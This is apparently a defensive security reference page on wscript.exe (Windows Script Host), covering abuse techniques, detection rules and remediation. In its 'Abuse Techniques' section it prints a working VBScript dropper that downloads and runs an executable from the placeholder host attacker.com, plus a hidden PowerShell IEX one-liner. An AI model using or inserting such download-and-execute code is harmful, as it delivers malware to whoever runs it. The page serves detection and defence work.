anavem.
Critical RiskWindowsLegitimateCommonly Abused
wscript.exeSCRIPT ENGINE

wscript.exe - Windows Script Host Security Analysis

wscript.exe (Windows Script Host) executes **VBScript and JScript** files. It is one of the **most abused Windows components** for malware delivery via email attachments (.vbs, .js, .wsf files). Nearly every wscript.exe execution in modern environments should be treated as **potentially malicious**.

Risk Summary

CRITICAL priority for SOC triage. wscript.exe/cscript.exe executions are **almost always malicious** in modern environments. Legitimate scripting uses PowerShell. Any execution of .vbs, .js, or .wsf files warrants **immediate investigation and containment**.

Overview

What is wscript.exe?

wscript.exe is the Windows Script Host GUI version, executing VBScript and JScript.

Related Executables

BinaryDescription
wscript.exeGUI script host
cscript.exeConsole script host

Why It's Dangerous

Primary Malware Vector:

  • Email attachments (.vbs, .js)
  • Download and execute capability
  • Full Windows API access
  • Trusted Microsoft binary

Security Significance

  • Malware Favorite: Top infection vector
  • Full System Access: No sandboxing
  • Phishing Delivery: Common email payload
  • Legacy Burden: Rarely needed legitimately

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\Windows\System32\wscript.exe
Parentexplorer.exe (double-click)
UserLogged-in user

Modern Reality

⚠️ wscript.exe execution in modern environments is
   SUSPICIOUS BY DEFAULT

Legitimate use cases:
- Legacy enterprise scripts (rare)
- Some installer scripts

Default Association

.vbs, .js, .wsf → wscript.exe

Common Locations

C:\Windows\System32\wscript.exeC:\Windows\SysWOW64\wscript.exeC:\Windows\System32\cscript.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Rare)

Script:      Known enterprise script
Path:        Approved script location
Parent:      Scheduled task (documented)
Frequency:   Rare

SUSPICIOUS (Default Assumption)

Script:      Email attachment
Path:        %TEMP%, Downloads, Desktop
Parent:      outlook.exe, browser
Behavior:    Network connections
             Spawning cmd/powershell
             Registry modifications

Immediate Red Flags

IndicatorRisk Level
Script from emailCRITICAL
Script from DownloadsCRITICAL
Spawns cmd/powershellCRITICAL
Network connectionCRITICAL

Abuse Techniques

Attack Techniques

Technique #1: Malware Dropper (T1059.005)

Classic Malicious VBS:

Set shell = CreateObject("Wscript.Shell")
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://attacker.com/mal.exe", False
http.Send
Set stream = CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
stream.Write http.responseBody
stream.SaveToFile "C:\mal.exe", 2
stream.Close
shell.Run "C:\mal.exe"

Technique #2: Phishing Delivery (T1566.001)

Email Attachment Flow:

  1. Victim receives email with .vbs/.js attachment
  2. User double-clicks → wscript.exe executes
  3. Script downloads and runs malware

Technique #3: Command Execution (T1059.003)

CreateObject("Wscript.Shell").Run "powershell -ep bypass -c IEX(...)", 0

Technique #4: Persistence (T1547.001)

Adding scripts to Run keys or Startup folder.

Detection Guidance

Detection Strategies

Priority #1: Any wscript.exe Execution

Process = "wscript.exe" OR Process = "cscript.exe"
→ ALERT: HIGH - Investigate immediately

Sigma Rule:

title: Script Host Execution
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith:
      - '\wscript.exe'
      - '\cscript.exe'
  condition: selection
level: high

Priority #2: Script from Suspicious Location

Process IN ["wscript.exe", "cscript.exe"] AND
CommandLine CONTAINS ["%TEMP%", "Downloads", "AppData\Local\Temp"]
→ ALERT: CRITICAL

Priority #3: Child Process Spawning

ParentProcess IN ["wscript.exe", "cscript.exe"] AND
ChildProcess IN ["cmd.exe", "powershell.exe"]
→ ALERT: CRITICAL - Likely malware

Remediation Steps

Protection and Remediation

Defense: Disable WSH (Recommended)

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000

Defense: Change File Association

Associate .vbs/.js with notepad.exe instead.

Defense: Block at Email Gateway

Block .vbs, .js, .wsf, .jse, .vbe attachments.

If Compromise Suspected

  1. Terminate wscript/cscript immediately
  2. Preserve script file
  3. Analyze script content
  4. Check for downloaded files
  5. Hunt for persistence
  6. Contain and remediate

Investigation Checklist

Investigation Checklist

  • Preserve the executed script file
  • Analyze script content for IOCs
  • Check script origin (email, download)
  • Review child processes
  • Check network connections made
  • Search for downloaded files
  • Review registry modifications
  • Check for persistence mechanisms

MITRE ATT&CK Techniques

T1059.005T1059.007T1566.001T1105

Related Windows Files

EXCEL.EXEhigh

EXCEL.EXE is **Microsoft Excel**, the spreadsheet application and a **primary malware delivery vecto...

Commonly Abused
everything.exelow

Everything is a fast file search utility by Voidtools. Attackers may use it for rapid file discovery...

expressvpn.exemedium

ExpressVPN is a commercial VPN service client. While legitimate for privacy, it can be abused for C2...

hitmanpro.exelow

HitmanPro is a portable anti-malware scanner from Sophos. It uses cloud-based behavioral analysis to...

Last verified: January 18, 2026